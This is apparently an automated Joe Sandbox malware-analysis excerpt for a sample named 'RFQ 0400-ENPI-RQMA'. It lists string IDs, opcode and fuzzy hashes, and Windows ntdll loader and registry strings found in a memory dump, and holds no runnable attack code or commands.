                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %$&$@
                                                                                      • API String ID: 0-1537733988
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0147C1C5
                                                                                      • @, xrefs: 0147C1F1
                                                                                      • PreferredUILanguages, xrefs: 0147C212
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                      • API String ID: 0-2968386058
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                      • API String ID: 0-1373925480
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 014329FE
                                                                                      • RtlCreateActivationContext, xrefs: 014329F9
                                                                                      • Actx , xrefs: 013F33AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • GlobalFlag, xrefs: 0144B68F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0144B632
                                                                                      • @, xrefs: 0144B670
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • BuildLabEx, xrefs: 0140130F
                                                                                      • @, xrefs: 014012A5
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0140127B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 014420F3
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01442104
                                                                                      • LdrpInitializationFailure, xrefs: 014420FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-2986994758
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: #%u
                                                                                      • API String ID: 48624451-232158463
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$`
                                                                                      • API String ID: 0-197956300
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 013CA2FB
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 013CA309
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: e3838348e70f0f15c9979f5030b1278ea6f3c3215835fb5b69146d2888e395e8
                                                                                      • Instruction ID: c37dd721858f222c2e43ad2586c17050e7af16f0b03fdee9258dd9291f6bc42d
                                                                                      • Opcode Fuzzy Hash: e3838348e70f0f15c9979f5030b1278ea6f3c3215835fb5b69146d2888e395e8
                                                                                      • Instruction Fuzzy Hash: 3831B1B2549305AFD321DF29C884A6BBBE8FF94658F44092FFA9583350DA34DD04CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                      • API String ID: 2994545307-4008356553
                                                                                      • Opcode ID: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
                                                                                      • Instruction ID: ccfddab3637653d6a98ec8c43d6f299e87fe2da50b1aeac6871064c5a1621b40
                                                                                      • Opcode Fuzzy Hash: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
                                                                                      • Instruction Fuzzy Hash: 0E01D1B2250704AFE312DF28CD45F1677E8E794729F01893EAA4CC7290E374D804CB46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
                                                                                      • Instruction ID: 8f80c92828f6888fe98f22915859bfdb9bc7ce97272d68dfb6a9d14493c95d1d
                                                                                      • Opcode Fuzzy Hash: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
                                                                                      • Instruction Fuzzy Hash: 87917372940219AFEB21DF99DC85FAE7BB8EF55754F110066F604AB2E0D774AD00CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PreferredUILanguages
                                                                                      • API String ID: 0-1884656846
                                                                                      • Opcode ID: b18c17fcab821c9886c1a2f7a31e4ba52530ae0516d4705a1016551a87e1d9d8
                                                                                      • Instruction ID: 79f4c4595e7ebd4232830c5e256f0d78c91f3f0e0f9fea7ebaac375ab8211fc7
                                                                                      • Opcode Fuzzy Hash: b18c17fcab821c9886c1a2f7a31e4ba52530ae0516d4705a1016551a87e1d9d8
                                                                                      • Instruction Fuzzy Hash: F041A172D00219ABDB11DA99C844BEFBBB9EF44758F05016BEE11EB360D634DE81C7A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: kLsE
                                                                                      • API String ID: 0-3058123920
                                                                                      • Opcode ID: 12723c19e6b995bdf16f66ed1c1d114704ca30224ae814a61f66690dcdd23de7
                                                                                      • Instruction ID: 173deb65a373bc6617517f23d77da3f8724b9185f279a7b586f892c4b855c2f2
                                                                                      • Opcode Fuzzy Hash: 12723c19e6b995bdf16f66ed1c1d114704ca30224ae814a61f66690dcdd23de7
                                                                                      • Instruction Fuzzy Hash: 7D414B7150135287E731AB7DE8C4BA63F98AB50B2DF15011FED505A2F9CB744886C7A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction ID: f47a36bc106faf543579527632dbcf97b76f99c87093e3319ca0d9d134d53bab
                                                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction Fuzzy Hash: CB419D75A0065AEBDF219F48C494BBEB7B5EB84709F00405EEA4AAB250DB34D941CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx
                                                                                      • API String ID: 0-89312691
                                                                                      • Opcode ID: a95995b042c8b86f99cd628fdef7b7754307930f04d4e085c320d468575c8686
                                                                                      • Instruction ID: 06fa1fcca58de5ced95115c727efb01d7f563a4ec9e6c77d125be261b41c184d
                                                                                      • Opcode Fuzzy Hash: a95995b042c8b86f99cd628fdef7b7754307930f04d4e085c320d468575c8686
                                                                                      • Instruction Fuzzy Hash: 8E1190313486268BEB29491D8C54636B7D9EBD1B2CF34813EE5A2CB791D6B1FC418380
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrCreateEnclave
                                                                                      • API String ID: 0-3262589265
                                                                                      • Opcode ID: 5602a6ff551c99e3e779fe0492c76ea53453427992a67817378426c1248ab82c
                                                                                      • Instruction ID: f839b51c347713489579dc135be0378a59dc5ca6947631f971d3f5c6bdc2c9bc
                                                                                      • Opcode Fuzzy Hash: 5602a6ff551c99e3e779fe0492c76ea53453427992a67817378426c1248ab82c
                                                                                      • Instruction Fuzzy Hash: 3F21F3B15083449FD320DF1A8844A9BFBE8FBE5B00F004A1FB99496360DBB0A844CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                      • Instruction ID: 08a47c893c27bc1fc88cb86d64b8066f72cc68088e68b400baca6b27a8085649
                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                      • Instruction Fuzzy Hash: B7B15772604646DFDB15CB68C850BBEBBFAEF84604F19015AE652DB391D730EE81CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1aee2d52d6c3d66f7f240ae7f2b4ba769b070993a67e0d07b9dee17c75edb068
                                                                                      • Instruction ID: bec0aef0f59c5fe11a674ab95b2ab6de2a1c0d5410ff98855e0dc9ed805109ce
                                                                                      • Opcode Fuzzy Hash: 1aee2d52d6c3d66f7f240ae7f2b4ba769b070993a67e0d07b9dee17c75edb068
                                                                                      • Instruction Fuzzy Hash: F5A1707190021AAFEF22DFA9CC45FAF7BB8AF55754F414065FA00AB2A0D7759C41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
                                                                                      • Instruction ID: 43d12452b4c722c9c1836b4e9c59c0dff4aadd3ecf9a07c8612a74a65917c817
                                                                                      • Opcode Fuzzy Hash: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
                                                                                      • Instruction Fuzzy Hash: 89C14774108341CFD764CF19C484BABB7E4BF98708F44496EE989873A1D7B5EA44CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
                                                                                      • Instruction ID: 2b4d85e220ca904df3a0bffea259567a7dff4d33b4fd108507b011443a7e1fbb
                                                                                      • Opcode Fuzzy Hash: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
                                                                                      • Instruction Fuzzy Hash: 62B19370B002698BDB35CF59C890BE9B7B5EF44704F1485EAD64AE7691EB30DE85CB20
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d2423d28a9d7b2e6dbe5f63d51bf1edbcb653deac61cd0845d145ba80722416
                                                                                      • Instruction ID: 2836135193a48f27c2b4845c2b7c58631eaaec0d4f6fe38de90ec394de4db273
                                                                                      • Opcode Fuzzy Hash: 2d2423d28a9d7b2e6dbe5f63d51bf1edbcb653deac61cd0845d145ba80722416
                                                                                      • Instruction Fuzzy Hash: 95A1F571E007399FEB21DB59C848BAEBBF4BB04718F450166EA00AB2E1D7749D84CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
                                                                                      • Instruction ID: c09964b17fcfe0c0c5fac481ef8029278f62fdd4f50f081a152e2bb6063a716f
                                                                                      • Opcode Fuzzy Hash: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
                                                                                      • Instruction Fuzzy Hash: 2CA1D171B016169BDB26DF6AC590BAAB7A1FF94354F00403AEA05973E2DB74E816CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81c2de1ca1aefdf8024c964f311bdd28673383c2494e935b65f4d82215c6c522
                                                                                      • Instruction ID: 6b6c4bc9e8bbae0c77803c1c6ad73e535eeb04b3731ca9a57bfd57f6b32bfbad
                                                                                      • Opcode Fuzzy Hash: 81c2de1ca1aefdf8024c964f311bdd28673383c2494e935b65f4d82215c6c522
                                                                                      • Instruction Fuzzy Hash: 69A1BE72A14612DFCB12DF18CA80B5ABBE9FF48718F49056EE5499B761C334ED02CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad7262b48db7c44a8f01941a689e4d8a47187b6d06b5a62fe9ce76e108cc07fd
                                                                                      • Instruction ID: a6fd91fe8adbad662e6e4b4f3c3ed65ce6c8380f6e10070b90112bb07d2d2ade
                                                                                      • Opcode Fuzzy Hash: ad7262b48db7c44a8f01941a689e4d8a47187b6d06b5a62fe9ce76e108cc07fd
                                                                                      • Instruction Fuzzy Hash: 10919271D00216AFEB15DF68D884BBEBBB5AB49710F16416AE610AB361D734D9009BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e1da9bf9cf3f754abf799225741a9c3f9b3a63fc9cda52cfb4a167132599f04
                                                                                      • Instruction ID: cd76e3de82c635bcdcfd0f6f85d21ede80945e8b219bced0d029da4bba014177
                                                                                      • Opcode Fuzzy Hash: 5e1da9bf9cf3f754abf799225741a9c3f9b3a63fc9cda52cfb4a167132599f04
                                                                                      • Instruction Fuzzy Hash: 76913733A00626CBEB24DB2DE480BBA7BB6EF4475CF45406AE905AF350E634D941C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f967fc9743bda568b417b8a091f2a1308b7e7e50f04facc7e298b4fcffcb1f78
                                                                                      • Instruction ID: f77ab936fd4dd30fdbbd988aad983190178c922a71fe7e44576eb16270091a47
                                                                                      • Opcode Fuzzy Hash: f967fc9743bda568b417b8a091f2a1308b7e7e50f04facc7e298b4fcffcb1f78
                                                                                      • Instruction Fuzzy Hash: 2EB101B56093418FD365CF28C580A5AFBF1BB88704F18496EF999D7362D331E94ACB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction ID: 1a32b5cb396c52b0804ca5a7682294abee860b45bbb357f488fb6267a3463493
                                                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction Fuzzy Hash: 7E718B35A0021A9BDB21CF69C480AFFFBF9EF54754F18411BE940AB361E334E9858B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction ID: 2150469acf4fbb4fdbced9fe7c61e24d6d82bae9073deb603d07b457020c7193
                                                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction Fuzzy Hash: C3819072E0022A8BDF14CF9CC9847AEBBB2FF84314F59416BD915B7394D631A981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f013a7bf418586ce3e7eec7c36b611a71a31891b55e1e33adc7671a17683dad4
                                                                                      • Instruction ID: 9725b691712df0d61abd9c4446d28509cbd77f665abffa275b5d43e1637e2877
                                                                                      • Opcode Fuzzy Hash: f013a7bf418586ce3e7eec7c36b611a71a31891b55e1e33adc7671a17683dad4
                                                                                      • Instruction Fuzzy Hash: CC816071900609AFDB25CFA9C884BEEBBB9FF88358F11443EE655A7260D770AC45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                      • Instruction ID: 455135802753f1c6ef0b4fd8323db5d86941b66171f3beaac4ffde38e42e5183
                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                      • Instruction Fuzzy Hash: 2D716FB1A00619AFDB10DFA9D944EDEBBB8FF58704F10456AE605A7260DB34EE41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
